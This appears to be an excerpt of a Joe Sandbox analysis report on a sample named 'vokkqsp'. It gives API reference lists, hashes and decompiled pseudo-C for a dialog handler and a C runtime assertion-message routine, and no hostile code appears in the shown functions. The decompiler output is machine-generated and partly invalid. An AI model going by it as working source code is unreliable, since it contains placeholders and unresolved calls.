                                                      APIs
                                                      • GetWindowTextLengthW.USER32 ref: 00401F15
                                                      • GetProcessHeap.KERNEL32(00000000), ref: 00401F25
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00401F2C
                                                      • GetWindowTextW.USER32 ref: 00401F44
                                                      • SendMessageW.USER32(000000B8,00000000,00000000), ref: 00401F5D
                                                      • DestroyWindow.USER32 ref: 00401F67
                                                      • GetClientRect.USER32(?), ref: 00401F77
                                                      • CreateWindowExW.USER32 ref: 00401FB5
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00401FCB
                                                      • SetWindowTextW.USER32(00000000), ref: 00401FD4
                                                      • SendMessageW.USER32(000000B9,00000000,00000000), ref: 00401FE8
                                                      • SetFocus.USER32 ref: 00401FF0
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401FFA
                                                      • HeapFree.KERNEL32(00000000), ref: 00402001
                                                      • GetMenu.USER32(00000119), ref: 0040202A
                                                      • CheckMenuItem.USER32 ref: 00402031
                                                      • #410.COMCTL32(004024C7,00000000,00000000), ref: 00402044
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Window$Heap$MessageSendText$MenuProcess$#410AllocCheckClientCreateDestroyFocusFreeItemLengthRect
                                                      • String ID: edit
                                                      • API String ID: 2317382731-2167791130
                                                      • Opcode ID: 3d108fc552a5024215aae559fa914cdc587b4e8acdf8b6445c050ab18c23d851
                                                      • Instruction ID: 57779657dcc640067b8d70a19ba0a3090d1ec050db6456008ca0fb8dd335274f
                                                      • Opcode Fuzzy Hash: 3d108fc552a5024215aae559fa914cdc587b4e8acdf8b6445c050ab18c23d851
                                                      • Instruction Fuzzy Hash: 75310A79152204BFEB515FA1EC8DE6A7F6AFB4A701B144134FB01910F0E7795C24DB28
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004022AA Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 132windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 55%
                                                      			E004022AA(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t21;
				void* _t39;
				signed int _t48;
				void* _t53;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				struct HWND__* _t66;
				struct HWND__* _t67;

				_t21 = _a8 - 0x110;
				if(_t21 == 0) {
					_t66 = _a4;
					SetDlgItemTextW(_t66, 0x141, 0x44dc80);
					SetDlgItemTextW(_t66, 0x143, 0x44de88);
					_push(0);
					_t58 = 0x64;
					asm("cdq");
					SetDlgItemInt(_t66, 0x14d,  *0x44dc70 / _t58, ??);
					_push(0);
					_t59 = 0x64;
					asm("cdq");
					SetDlgItemInt(_t66, 0x150,  *0x44dc74 / _t59, ??);
					_push(0);
					_t60 = 0x64;
					asm("cdq");
					SetDlgItemInt(_t66, 0x147,  *0x44dc78 / _t60, ??);
					_push(0);
					_t61 = 0x64;
					asm("cdq");
					SetDlgItemInt(_t66, 0x14a,  *0x44dc7c / _t61, ??);
					L11:
					return 0;
				}
				if(_t21 != 1) {
					goto L11;
				}
				_t39 = _a12 - 1;
				if(_t39 == 0) {
					_t67 = _a4;
					GetDlgItemTextW(_t67, 0x141, 0x44dc80, 0);
					GetDlgItemTextW(_t67, 0x143, 0x44de88, 0);
					 *0x44dc70 = GetDlgItemInt(_t67, 0x14d, 0, 0) * 0x64;
					 *0x44dc74 = GetDlgItemInt(_t67, 0x150, 0, 0) * 0x64;
					 *0x44dc78 = GetDlgItemInt(_t67, 0x147, 0, 0) * 0x64;
					_t48 = GetDlgItemInt(_t67, 0x14a, 0, 0);
					_push(1);
					_push(_t67);
					 *0x44dc7c = _t48 * 0x64;
					L8:
					EndDialog();
					L9:
					return 1;
				}
				_t53 = _t39 - 1;
				if(_t53 == 0) {
					_push(2);
					_push(_a4);
					goto L8;
				}
				if(_t53 != 7) {
					goto L11;
				}
				MessageBoxW( *0x44cf04, L"Sorry, no help available", L"Help", 0x30);
				goto L9;
			}













                                                      0x004022b3
                                                      0x004022b8
                                                      0x00402387
                                                      0x0040239b
                                                      0x004023a8
                                                      0x004023b1
                                                      0x004023b4
                                                      0x004023b5
                                                      0x004023c5
                                                      0x004023cc
                                                      0x004023cf
                                                      0x004023d0
                                                      0x004023da
                                                      0x004023e1
                                                      0x004023e4
                                                      0x004023e5
                                                      0x004023ef
                                                      0x004023f6
                                                      0x004023f9
                                                      0x004023fa
                                                      0x00402404
                                                      0x00402406
                                                      0x00000000
                                                      0x00402406
                                                      0x004022c1
                                                      0x00000000
                                                      0x00000000
                                                      0x004022ca
                                                      0x004022cd
                                                      0x00402301
                                                      0x00402318
                                                      0x00402326
                                                      0x00402343
                                                      0x00402355
                                                      0x00402367
                                                      0x0040236c
                                                      0x00402371
                                                      0x00402373
                                                      0x00402374
                                                      0x00402379
                                                      0x00402379
                                                      0x0040237f
                                                      0x00000000
                                                      0x00402381
                                                      0x004022cf
                                                      0x004022d2
                                                      0x004022fa
                                                      0x004022fc
                                                      0x00000000
                                                      0x004022fc
                                                      0x004022d7
                                                      0x00000000
                                                      0x00000000
                                                      0x004022ef
                                                      0x00000000

                                                      APIs
                                                      • MessageBoxW.USER32(Sorry, no help available,Help,00000030), ref: 004022EF
                                                      • GetDlgItemTextW.USER32(?,00000141,0044DC80,00000000), ref: 00402318
                                                      • GetDlgItemTextW.USER32(?,00000143,0044DE88,00000000), ref: 00402326
                                                      • GetDlgItemInt.USER32(?,0000014D,00000000,00000000), ref: 00402336
                                                      • GetDlgItemInt.USER32(?,00000150,00000000,00000000), ref: 00402348
                                                      • GetDlgItemInt.USER32(?,00000147,00000000,00000000), ref: 0040235A
                                                      • GetDlgItemInt.USER32(?,0000014A,00000000,00000000), ref: 0040236C
                                                      • EndDialog.USER32(?,00000001), ref: 00402379
                                                      • SetDlgItemTextW.USER32 ref: 0040239B
                                                      • SetDlgItemTextW.USER32 ref: 004023A8
                                                      • SetDlgItemInt.USER32(?,0000014D,?,00000000), ref: 004023C5
                                                      • SetDlgItemInt.USER32(?,00000150,?,00000000), ref: 004023DA
                                                      • SetDlgItemInt.USER32(?,00000147,?,00000000), ref: 004023EF
                                                      • SetDlgItemInt.USER32(?,0000014A,?,00000000), ref: 00402404
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Item$Text$DialogMessage
                                                      • String ID: Help$Sorry, no help available
                                                      • API String ID: 538086343-856071037
                                                      • Opcode ID: 56d51fb1a839754b542b1ba68e94aaf728e389295ce8ae37ce0808c000f2fc2e
                                                      • Instruction ID: 75e1db2b5784b1530bfebf3e4010b06c5cc7c9ec011124ef816db1d6f016c6e7
                                                      • Opcode Fuzzy Hash: 56d51fb1a839754b542b1ba68e94aaf728e389295ce8ae37ce0808c000f2fc2e
                                                      • Instruction Fuzzy Hash: 223194B1B803197AF6004B759DCAE7B2AACE75AB54F10003BF604BA1E0C6F89D01D668
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040C039 Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 402COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 44%
                                                      			E0040C039(void* __ebx, WCHAR* __ecx, void* __edi, void* __esi, char _a4, char _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20, char* _a24) {
				char _v0;
				char _v4;
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v532;
				signed int _v536;
				signed int _v540;
				WCHAR* _v544;
				signed int _v548;
				intOrPtr* _v552;
				WCHAR* _v556;
				intOrPtr _v588;
				intOrPtr* _v592;
				intOrPtr* _v596;
				void* _v600;
				intOrPtr* _v604;
				intOrPtr* _v608;
				char _v612;
				void* __ebp;
				signed int _t99;
				void* _t103;
				char* _t108;
				void* _t120;
				char* _t122;
				void* _t140;
				void* _t142;
				void* _t144;
				void* _t145;
				signed int _t149;
				struct HINSTANCE__* _t151;
				char _t153;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t161;
				void* _t162;
				intOrPtr _t163;
				intOrPtr _t164;
				void* _t168;
				void* _t169;
				void* _t170;
				intOrPtr _t171;
				intOrPtr _t172;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t183;
				void* _t184;
				signed int _t185;
				WCHAR* _t187;
				char* _t188;
				char* _t189;
				char* _t192;
				char* _t193;
				void* _t196;
				void* _t197;
				char* _t199;
				char* _t200;
				void* _t202;
				void* _t204;
				void* _t205;
				signed int _t207;
				void* _t208;
				void* _t209;
				void* _t211;
				char* _t213;
				signed int _t217;
				WCHAR* _t220;
				void* _t223;
				char* _t226;
				signed int _t228;
				intOrPtr* _t230;
				intOrPtr* _t232;
				intOrPtr* _t235;
				void* _t239;
				void* _t243;
				intOrPtr* _t244;
				void* _t246;
				signed int _t247;
				char _t249;
				signed short* _t252;
				intOrPtr* _t254;
				signed int _t256;
				void* _t257;
				void* _t258;
				void* _t260;
				void* _t261;
				void* _t262;
				void* _t263;
				void* _t266;

				_t220 = __ecx;
				_t99 =  *0x44b018; // 0x1989d38f
				_v8 = _t99 ^ _t256;
				_t213 = _a24;
				_t254 = _a4;
				_t249 = _a8;
				_v552 = _a12;
				_v536 = _a16;
				_t103 = E00422A82(_t254, _t249, L"Assertion failed!");
				_v540 = _v540 & 0x00000000;
				_t261 = _t260 + 0xc;
				if(_t103 != 0) {
					L64:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0041F197();
					asm("int3");
					_push(_t256);
					_t257 = _t261;
					_push(_t220);
					_push(_t220);
					_t223 = E0041519A( &_v600, E0041F307(2));
					_t108 = E0040B665(_t223);
					__eflags = _t108;
					if(_t108 == 0) {
						_push(0);
						_push(4);
						_t142 = E0041F307(2);
						_t223 = 0;
						_push(_t142);
						E004233D1(_t242);
						_t261 = _t261 + 0x10;
					}
					_push(0);
					_v12 = E0040C8FE();
					_v16 = E0041F307(2);
					_push( &_a8);
					_push( &_a4);
					_push( &_v0);
					L71();
					E00421D48(_t223, _t242, E0041F307(2));
					_t262 = _t261 + 0x24;
					E00410889(_t213, _t223, _t242, _t249, _t254,  &_v16,  &_v12);
					asm("int3");
					_push(_t257);
					_t258 = _t262;
					_push(_t223);
					_push(_t223);
					E0040C84F(_t213, _t249, _t254, _v596, _v592, _v588);
					_t120 = E0041F307(2);
					_t263 = _t262 + 0x10;
					_t225 = E0041519A( &_v612, _t120);
					_t122 = E0040B665(_t121);
					__eflags = _t122;
					if(_t122 == 0) {
						_push(0);
						_push(4);
						_t140 = E0041F307(2);
						_t225 = 0;
						_push(_t140);
						E004233D1(_t242);
						_t263 = _t263 + 0x10;
					}
					_push(0);
					_v16 = E0040C904();
					_v20 = E0041F307(2);
					E0040C64D( &_v20,  &_v16,  &_v4,  &_v0,  &_a4);
					E00421D48(_t225, _t242, E0041F307(2));
					E00410889(_t213, _t225, _t242, _t249, _t254);
					asm("int3");
					_push(_t258);
					_push( *_v592);
					_push( *_v596);
					return E0040CAC5( *_v608,  *_v604,  *_v600);
				} else {
					_push(L"\n\n");
					_push(_t249);
					_t144 = E00422A13(_t254);
					_t261 = _t261 + 0xc;
					if(_t144 != 0) {
						goto L64;
					} else {
						_push(L"Program: ");
						_push(_t249);
						_t145 = E00422A13(_t254);
						_t261 = _t261 + 0xc;
						if(_t145 != 0) {
							goto L64;
						} else {
							E00403D00(_t249,  &_v532, _t145, 0x20a);
							_t266 = _t261 + 0xc;
							_v548 = 0;
							_t149 =  &_v548;
							__imp__GetModuleHandleExW(6, _t213, _t149);
							_t220 =  &_v532;
							_t213 = 0x105;
							asm("sbb eax, eax");
							_t151 =  ~_t149 & _v548;
							_v548 = _t151;
							if(GetModuleFileNameW(_t151, _t220, 0x105) != 0) {
								L5:
								_t213 =  &_v532;
								_t226 = _t213;
								_t242 =  &(_t226[2]);
								do {
									_t153 =  *_t226;
									_t226 =  &(_t226[2]);
								} while (_t153 != _v540);
								_t220 = _t226 - _t242 >> 1;
								if( &(_t220[5]) <= 0x40) {
									L9:
									_push(_t213);
									_push(_t249);
									_t155 = E00422A13(_t254);
									_t261 = _t266 + 0xc;
									if(_t155 != 0) {
										goto L64;
									} else {
										_push("\n");
										_push(_t249);
										_t156 = E00422A13(_t254);
										_t261 = _t261 + 0xc;
										if(_t156 != 0) {
											goto L64;
										} else {
											_push(L"File: ");
											_push(_t249);
											_t157 = E00422A13(_t254);
											_t261 = _t261 + 0xc;
											if(_t157 != 0) {
												goto L64;
											} else {
												_t242 = _v536;
												_t228 = _t242;
												_t213 = _t228 + 2;
												do {
													_t158 =  *_t228;
													_t228 = _t228 + 2;
												} while (_t158 != _v540);
												_t220 = _t228 - _t213 >> 1;
												if( &(_t220[4]) <= 0x40) {
													_push(_t242);
													goto L33;
												} else {
													_t217 = _t242;
													_t239 = _t217 + 2;
													do {
														_t184 =  *_t217;
														_t217 = _t217 + 2;
													} while (_t184 != _v540);
													_v544 = 0x5c;
													_t213 = _t217 - _t239 >> 1;
													_t220 = 1;
													_t185 =  *(_t242 + _t213 * 2 - 2) & 0x0000ffff;
													if(_t185 != _v544) {
														_v556 = _t185;
														_t252 = _t242 - 2 + _t213 * 2;
														_t247 = _t185;
														while(_t247 != 0x2f && _t220 < _t213) {
															_t252 = _t252 - 2;
															_t220 =  &(_t220[0]);
															_t207 =  *_t252 & 0x0000ffff;
															_t247 = _t207;
															if(_t207 != _v544) {
																continue;
															}
															break;
														}
														_t249 = _a8;
														_t242 = _v536;
													}
													_t187 = _t213 - _t220;
													_v544 = _t187;
													if(_t187 <= 0x26) {
														if(__eflags >= 0) {
															goto L56;
														} else {
															_t197 = 0x35;
															_t220 = _t220 >> 1;
															_v556 = _t220;
															_push(_t197 - _t220);
															_t199 = E00422BD3(_t220, _t254, _t249, _t242);
															_t261 = _t261 + 0x10;
															__eflags = _t199;
															if(_t199 != 0) {
																goto L64;
															} else {
																_push(L"...");
																_push(_t249);
																_t200 = E00422A13(_t254);
																_t261 = _t261 + 0xc;
																__eflags = _t200;
																if(_t200 != 0) {
																	goto L64;
																} else {
																	_t213 = _t213 - _v556;
																	__eflags = _t213;
																	_t196 = _v536 + _t213 * 2;
																	goto L32;
																}
															}
														}
													} else {
														if(_t220 >= 0x12) {
															L56:
															_push(0x23);
															_t188 = E00422BD3(_t220, _t254, _t249, _t242);
															_t261 = _t261 + 0x10;
															__eflags = _t188;
															if(_t188 != 0) {
																goto L64;
															} else {
																_push(L"...");
																_push(_t249);
																_t189 = E00422A13(_t254);
																_t261 = _t261 + 0xc;
																__eflags = _t189;
																if(_t189 != 0) {
																	goto L64;
																} else {
																	_t220 = _v544;
																	_push(8);
																	_t192 = E00422BD3(_t220, _t254, _t249, _v536 + _t220 * 2);
																	_t261 = _t261 + 0x10;
																	__eflags = _t192;
																	if(_t192 != 0) {
																		goto L64;
																	} else {
																		_push(L"...");
																		_push(_t249);
																		_t193 = E00422A13(_t254);
																		_t261 = _t261 + 0xc;
																		__eflags = _t193;
																		if(_t193 != 0) {
																			goto L64;
																		} else {
																			_t196 = _v536 + _t213 * 2 + 0xfffffff2;
																			goto L32;
																		}
																	}
																}
															}
														} else {
															_t202 = 0x35;
															_push(_t202 - _t220);
															_t204 = E00422BD3(_t220, _t254, _t249, _t242);
															_t261 = _t261 + 0x10;
															if(_t204 != 0) {
																goto L64;
															} else {
																_push(L"...");
																_push(_t249);
																_t205 = E00422A13(_t254);
																_t261 = _t261 + 0xc;
																if(_t205 != 0) {
																	goto L64;
																} else {
																	_t220 = _v544;
																	_t196 = _v536 + _t220 * 2;
																	L32:
																	_push(_t196);
																	L33:
																	_push(_t249);
																	_t160 = E00422A13(_t254);
																	_t261 = _t261 + 0xc;
																	if(_t160 != 0) {
																		goto L64;
																	} else {
																		_push("\n");
																		_push(_t249);
																		_t161 = E00422A13(_t254);
																		_t261 = _t261 + 0xc;
																		if(_t161 != 0) {
																			goto L64;
																		} else {
																			_push(L"Line: ");
																			_push(_t249);
																			_t162 = E00422A13(_t254);
																			_t261 = _t261 + 0xc;
																			if(_t162 != 0) {
																				goto L64;
																			} else {
																				_t230 = _t254;
																				_t243 = _t230 + 2;
																				do {
																					_t163 =  *_t230;
																					_t230 = _t230 + 2;
																				} while (_t163 != 0);
																				_t244 = _t254;
																				_t220 = _t230 - _t243 >> 1;
																				_t213 = _t244 + 2;
																				do {
																					_t164 =  *_t244;
																					_t244 = _t244 + 2;
																				} while (_t164 != _v540);
																				_t242 = _t244 - _t213 >> 1;
																				_t168 = E00422790(_t220, _a20, _t254 + (_t244 - _t213 >> 1) * 2, _t249 - _t220, 0xa);
																				_t261 = _t261 + 0x10;
																				if(_t168 != 0) {
																					goto L64;
																				} else {
																					_push(L"\n\n");
																					_push(_t249);
																					_t169 = E00422A13(_t254);
																					_t261 = _t261 + 0xc;
																					if(_t169 != 0) {
																						goto L64;
																					} else {
																						_push(L"Expression: ");
																						_push(_t249);
																						_t170 = E00422A13(_t254);
																						_t261 = _t261 + 0xc;
																						if(_t170 != 0) {
																							goto L64;
																						} else {
																							_t232 = _t254;
																							_t246 = _t232 + 2;
																							do {
																								_t171 =  *_t232;
																								_t232 = _t232 + 2;
																							} while (_t171 != 0);
																							_t242 = (_t232 - _t246 >> 1) + 0xb0;
																							_t235 = _v552;
																							_t213 = _t235 + 2;
																							do {
																								_t172 =  *_t235;
																								_t235 = _t235 + 2;
																							} while (_t172 != _v540);
																							_t220 = _t235 - _t213 >> 1;
																							if(_t220 + _t242 <= _t249) {
																								_push(_v552);
																								goto L50;
																							} else {
																								_push(_t249 - _t242 - 3);
																								_t183 = E00422BD3(_t220, _t254, _t249, _v552);
																								_t261 = _t261 + 0x10;
																								if(_t183 != 0) {
																									goto L64;
																								} else {
																									_push(L"...");
																									L50:
																									_push(_t249);
																									_t174 = E00422A13(_t254);
																									_t261 = _t261 + 0xc;
																									if(_t174 != 0) {
																										goto L64;
																									} else {
																										_t213 = L"\n\n";
																										_push(_t213);
																										_push(_t249);
																										_t175 = E00422A13(_t254);
																										_t261 = _t261 + 0xc;
																										if(_t175 != 0) {
																											goto L64;
																										} else {
																											_push(L"For information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts");
																											_push(_t249);
																											_t176 = E00422A13(_t254);
																											_t261 = _t261 + 0xc;
																											if(_t176 != 0) {
																												goto L64;
																											} else {
																												_push(_t213);
																												_push(_t249);
																												_t177 = E00422A13(_t254);
																												_t261 = _t261 + 0xc;
																												if(_t177 != 0) {
																													goto L64;
																												} else {
																													_push(L"(Press Retry to debug the application - JIT must be enabled)");
																													_push(_t249);
																													_t178 = E00422A13(_t254);
																													_t261 = _t261 + 0xc;
																													if(_t178 != 0) {
																														goto L64;
																													} else {
																														return E0040361D(_v8 ^ _t256);
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t208 = _t220 * 2 - 0x6a;
									_t220 = 0x20a - _t208;
									_t213 =  &_v532 + _t208;
									_t209 = E00434658(_t213, _t220, L"...", 6);
									_t261 = _t266 + 0x10;
									if(_t209 != 0) {
										goto L64;
									} else {
										goto L9;
									}
								}
							} else {
								_t211 = E00422A82( &_v532, 0x105, L"<program name unknown>");
								_t261 = _t266 + 0xc;
								if(_t211 != 0) {
									goto L64;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}



































































































                                                      0x0040c039
                                                      0x0040c044
                                                      0x0040c04b
                                                      0x0040c052
                                                      0x0040c056
                                                      0x0040c05a
                                                      0x0040c062
                                                      0x0040c06d
                                                      0x0040c073
                                                      0x0040c078
                                                      0x0040c07f
                                                      0x0040c084
                                                      0x0040c50e
                                                      0x0040c510
                                                      0x0040c511
                                                      0x0040c512
                                                      0x0040c513
                                                      0x0040c514
                                                      0x0040c515
                                                      0x0040c51a
                                                      0x0040c51d
                                                      0x0040c51e
                                                      0x0040c520
                                                      0x0040c521
                                                      0x0040c533
                                                      0x0040c535
                                                      0x0040c53a
                                                      0x0040c53c
                                                      0x0040c53e
                                                      0x0040c540
                                                      0x0040c546
                                                      0x0040c54b
                                                      0x0040c54c
                                                      0x0040c54d
                                                      0x0040c552
                                                      0x0040c552
                                                      0x0040c555
                                                      0x0040c55e
                                                      0x0040c566
                                                      0x0040c56c
                                                      0x0040c570
                                                      0x0040c574
                                                      0x0040c57d
                                                      0x0040c58a
                                                      0x0040c58f
                                                      0x0040c592
                                                      0x0040c597
                                                      0x0040c59a
                                                      0x0040c59b
                                                      0x0040c59d
                                                      0x0040c59e
                                                      0x0040c5a8
                                                      0x0040c5af
                                                      0x0040c5b4
                                                      0x0040c5c0
                                                      0x0040c5c2
                                                      0x0040c5c7
                                                      0x0040c5c9
                                                      0x0040c5cb
                                                      0x0040c5cd
                                                      0x0040c5d3
                                                      0x0040c5d8
                                                      0x0040c5d9
                                                      0x0040c5da
                                                      0x0040c5df
                                                      0x0040c5df
                                                      0x0040c5e2
                                                      0x0040c5eb
                                                      0x0040c5f3
                                                      0x0040c60a
                                                      0x0040c617
                                                      0x0040c61f
                                                      0x0040c624
                                                      0x0040c627
                                                      0x0040c62d
                                                      0x0040c632
                                                      0x0040c64c
                                                      0x0040c08a
                                                      0x0040c08a
                                                      0x0040c08f
                                                      0x0040c091
                                                      0x0040c096
                                                      0x0040c09b
                                                      0x00000000
                                                      0x0040c0a1
                                                      0x0040c0a1
                                                      0x0040c0a6
                                                      0x0040c0a8
                                                      0x0040c0ad
                                                      0x0040c0b2
                                                      0x00000000
                                                      0x0040c0b8
                                                      0x0040c0c5
                                                      0x0040c0ca
                                                      0x0040c0cf
                                                      0x0040c0d5
                                                      0x0040c0df
                                                      0x0040c0e7
                                                      0x0040c0ed
                                                      0x0040c0f3
                                                      0x0040c0f5
                                                      0x0040c0fd
                                                      0x0040c10b
                                                      0x0040c12a
                                                      0x0040c12a
                                                      0x0040c130
                                                      0x0040c132
                                                      0x0040c135
                                                      0x0040c135
                                                      0x0040c138
                                                      0x0040c13b
                                                      0x0040c146
                                                      0x0040c14e
                                                      0x0040c17f
                                                      0x0040c17f
                                                      0x0040c180
                                                      0x0040c182
                                                      0x0040c187
                                                      0x0040c18c
                                                      0x00000000
                                                      0x0040c192
                                                      0x0040c192
                                                      0x0040c197
                                                      0x0040c199
                                                      0x0040c19e
                                                      0x0040c1a3
                                                      0x00000000
                                                      0x0040c1a9
                                                      0x0040c1a9
                                                      0x0040c1ae
                                                      0x0040c1b0
                                                      0x0040c1b5
                                                      0x0040c1ba
                                                      0x00000000
                                                      0x0040c1c0
                                                      0x0040c1c0
                                                      0x0040c1c6
                                                      0x0040c1c8
                                                      0x0040c1cb
                                                      0x0040c1cb
                                                      0x0040c1ce
                                                      0x0040c1d1
                                                      0x0040c1dc
                                                      0x0040c1e4
                                                      0x0040c4ee
                                                      0x00000000
                                                      0x0040c1ea
                                                      0x0040c1ea
                                                      0x0040c1ec
                                                      0x0040c1ef
                                                      0x0040c1ef
                                                      0x0040c1f2
                                                      0x0040c1f5
                                                      0x0040c200
                                                      0x0040c20a
                                                      0x0040c20e
                                                      0x0040c20f
                                                      0x0040c21b
                                                      0x0040c220
                                                      0x0040c226
                                                      0x0040c229
                                                      0x0040c22b
                                                      0x0040c235
                                                      0x0040c238
                                                      0x0040c239
                                                      0x0040c23c
                                                      0x0040c245
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040c245
                                                      0x0040c247
                                                      0x0040c24a
                                                      0x0040c24a
                                                      0x0040c252
                                                      0x0040c254
                                                      0x0040c25d
                                                      0x0040c2a9
                                                      0x00000000
                                                      0x0040c2af
                                                      0x0040c2b1
                                                      0x0040c2b2
                                                      0x0040c2b6
                                                      0x0040c2bc
                                                      0x0040c2c0
                                                      0x0040c2c5
                                                      0x0040c2c8
                                                      0x0040c2ca
                                                      0x00000000
                                                      0x0040c2d0
                                                      0x0040c2d0
                                                      0x0040c2d5
                                                      0x0040c2d7
                                                      0x0040c2dc
                                                      0x0040c2df
                                                      0x0040c2e1
                                                      0x00000000
                                                      0x0040c2e7
                                                      0x0040c2e7
                                                      0x0040c2e7
                                                      0x0040c2f3
                                                      0x00000000
                                                      0x0040c2f3
                                                      0x0040c2e1
                                                      0x0040c2ca
                                                      0x0040c25f
                                                      0x0040c262
                                                      0x0040c486
                                                      0x0040c486
                                                      0x0040c48b
                                                      0x0040c490
                                                      0x0040c493
                                                      0x0040c495
                                                      0x00000000
                                                      0x0040c497
                                                      0x0040c497
                                                      0x0040c49c
                                                      0x0040c49e
                                                      0x0040c4a3
                                                      0x0040c4a6
                                                      0x0040c4a8
                                                      0x00000000
                                                      0x0040c4aa
                                                      0x0040c4aa
                                                      0x0040c4b6
                                                      0x0040c4be
                                                      0x0040c4c3
                                                      0x0040c4c6
                                                      0x0040c4c8
                                                      0x00000000
                                                      0x0040c4ca
                                                      0x0040c4ca
                                                      0x0040c4cf
                                                      0x0040c4d1
                                                      0x0040c4d6
                                                      0x0040c4d9
                                                      0x0040c4db
                                                      0x00000000
                                                      0x0040c4dd
                                                      0x0040c4e6
                                                      0x00000000
                                                      0x0040c4e6
                                                      0x0040c4db
                                                      0x0040c4c8
                                                      0x0040c4a8
                                                      0x0040c268
                                                      0x0040c26a
                                                      0x0040c26d
                                                      0x0040c271
                                                      0x0040c276
                                                      0x0040c27b
                                                      0x00000000
                                                      0x0040c281
                                                      0x0040c281
                                                      0x0040c286
                                                      0x0040c288
                                                      0x0040c28d
                                                      0x0040c292
                                                      0x00000000
                                                      0x0040c298
                                                      0x0040c29e
                                                      0x0040c2a4
                                                      0x0040c2f6
                                                      0x0040c2f6
                                                      0x0040c2f7
                                                      0x0040c2f7
                                                      0x0040c2f9
                                                      0x0040c2fe
                                                      0x0040c303
                                                      0x00000000
                                                      0x0040c309
                                                      0x0040c309
                                                      0x0040c30e
                                                      0x0040c310
                                                      0x0040c315
                                                      0x0040c31a
                                                      0x00000000
                                                      0x0040c320
                                                      0x0040c320
                                                      0x0040c325
                                                      0x0040c327
                                                      0x0040c32c
                                                      0x0040c331
                                                      0x00000000
                                                      0x0040c337
                                                      0x0040c337
                                                      0x0040c33b
                                                      0x0040c33e
                                                      0x0040c33e
                                                      0x0040c341
                                                      0x0040c344
                                                      0x0040c34b
                                                      0x0040c34d
                                                      0x0040c34f
                                                      0x0040c352
                                                      0x0040c352
                                                      0x0040c355
                                                      0x0040c358
                                                      0x0040c365
                                                      0x0040c373
                                                      0x0040c378
                                                      0x0040c37d
                                                      0x00000000
                                                      0x0040c383
                                                      0x0040c383
                                                      0x0040c388
                                                      0x0040c38a
                                                      0x0040c38f
                                                      0x0040c394
                                                      0x00000000
                                                      0x0040c39a
                                                      0x0040c39a
                                                      0x0040c39f
                                                      0x0040c3a1
                                                      0x0040c3a6
                                                      0x0040c3ab
                                                      0x00000000
                                                      0x0040c3b1
                                                      0x0040c3b1
                                                      0x0040c3b5
                                                      0x0040c3b8
                                                      0x0040c3b8
                                                      0x0040c3bb
                                                      0x0040c3be
                                                      0x0040c3c7
                                                      0x0040c3cd
                                                      0x0040c3d3
                                                      0x0040c3d6
                                                      0x0040c3d6
                                                      0x0040c3d9
                                                      0x0040c3dc
                                                      0x0040c3e7
                                                      0x0040c3ee
                                                      0x0040c4f4
                                                      0x00000000
                                                      0x0040c3f4
                                                      0x0040c3fb
                                                      0x0040c404
                                                      0x0040c409
                                                      0x0040c40e
                                                      0x00000000
                                                      0x0040c414
                                                      0x0040c414
                                                      0x0040c419
                                                      0x0040c419
                                                      0x0040c41b
                                                      0x0040c420
                                                      0x0040c425
                                                      0x00000000
                                                      0x0040c42b
                                                      0x0040c42b
                                                      0x0040c430
                                                      0x0040c431
                                                      0x0040c433
                                                      0x0040c438
                                                      0x0040c43d
                                                      0x00000000
                                                      0x0040c443
                                                      0x0040c443
                                                      0x0040c448
                                                      0x0040c44a
                                                      0x0040c44f
                                                      0x0040c454
                                                      0x00000000
                                                      0x0040c45a
                                                      0x0040c45a
                                                      0x0040c45b
                                                      0x0040c45d
                                                      0x0040c462
                                                      0x0040c467
                                                      0x00000000
                                                      0x0040c46d
                                                      0x0040c46d
                                                      0x0040c472
                                                      0x0040c474
                                                      0x0040c479
                                                      0x0040c47e
                                                      0x00000000
                                                      0x0040c484
                                                      0x0040c50d
                                                      0x0040c50d
